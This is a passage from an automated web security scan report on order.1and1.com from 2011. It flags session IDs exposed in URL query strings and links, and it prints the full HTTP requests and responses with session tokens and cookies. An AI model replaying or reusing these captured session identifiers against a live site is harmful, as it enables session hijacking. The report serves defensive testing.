The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/LocalSubmission;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.listlocal HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:34:10 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/LocalSubmission?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.listlocal
Content-Length: 0
Connection: close
Content-Type: text/plain


3.78. http://order.1and1.com/xml/order/Mail

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Mail

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/Mail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__reuse=1300643443260
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=taV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCoqKSclJyo=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:26:AAABLtRlgbZ6_eg4OG2LZboWFQTS2jli:1300643545526; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:52:06 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Sal8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSsrKigmKCs=; Expires=Fri, 07-Apr-2079 21:06:13 GMT; Path=/
ETag: d9cfb4af92e44225f0ad2cca48eb1ca6
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 18209


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=Mail&amp;linkOrigin=Mail&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=Mail&amp;page=switch&amp;linkOrigin=Mail&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<img src="/oneandone_en_common/img/pages/Mail/vi_mail_address.png" alt="Mail" class="pos alphapng" style="margin-left: -40px;" width="299" height="86"><a class="btn btn-yellow-large btn-select" href="/xml/order/MailInstantMail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static"><span>
...[SNIP]...
</ul><a class="btn btn-blue-large btn-select" href="/xml/order/MicrosoftExchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static"><span>
...[SNIP]...
</ul><a class="btn btn-blue-large btn-select" href="/xml/order/MailXchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static"><span>
...[SNIP]...
<p>* Offers valid for a limited time only. Setup fee and other terms and conditions may apply.
<a class="core_button_normal" href="/xml/order/TcSpecialOffers;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static">Click here</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=Mail&amp;linkOrigin=Mail&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.79. http://order.1and1.com/xml/order/Mail

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Mail

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Mail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__reuse=1300643443260
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=taV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCoqKSclJyo=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:26:AAABLtRlgbZ6_eg4OG2LZboWFQTS2jli:1300643545526; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:52:06 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Sal8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSsrKigmKCs=; Expires=Fri, 07-Apr-2079 21:06:13 GMT; Path=/
ETag: d9cfb4af92e44225f0ad2cca48eb1ca6
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 18209


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.80. http://order.1and1.com/xml/order/MailInstantMail

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/MailInstantMail

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/MailInstantMail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:24:19 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/MailInstantMail?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.domains
Content-Length: 0
Connection: close
Content-Type: text/plain


3.81. http://order.1and1.com/xml/order/MailXchange

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/MailXchange

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/MailXchange;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:24:37 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/MailXchange?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.ecommerce
Content-Length: 0
Connection: close
Content-Type: text/plain


3.82. http://order.1and1.com/xml/order/MicrosoftExchange

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/MicrosoftExchange

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/MicrosoftExchange;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:25:09 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/MicrosoftExchange?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail
Content-Length: 0
Connection: close
Content-Type: text/plain


3.83. http://order.1and1.com/xml/order/Moneyback

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Moneyback

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Moneyback;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:37:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Moneyback?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.84. http://order.1and1.com/xml/order/MsHosting

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/MsHosting

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=; emos1und1d1_jcsid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k22HCyrc0S5Ck_gLCqZigiV2:1300632671085; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1300632671085:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:55:42 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=kcmc3OjsxWlpaVGddZCpiXCkbJXVoYjpRRD4mKicnJiQmJCEhJCMdICQXMC8uK1A+al9hbycpJFQtV2YsHyAcGyAzMTQyLDQrKjNrbDIlLl5nLSAhHRwhHTI1My01LCs=; Expires=Fri, 07-Apr-2079 18:09:49 GMT; Path=/
ETag: b67acb7c15edd14e68367a76bb0bfc39
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 59574


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=MsHosting&amp;linkOrigin=MsHosting&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
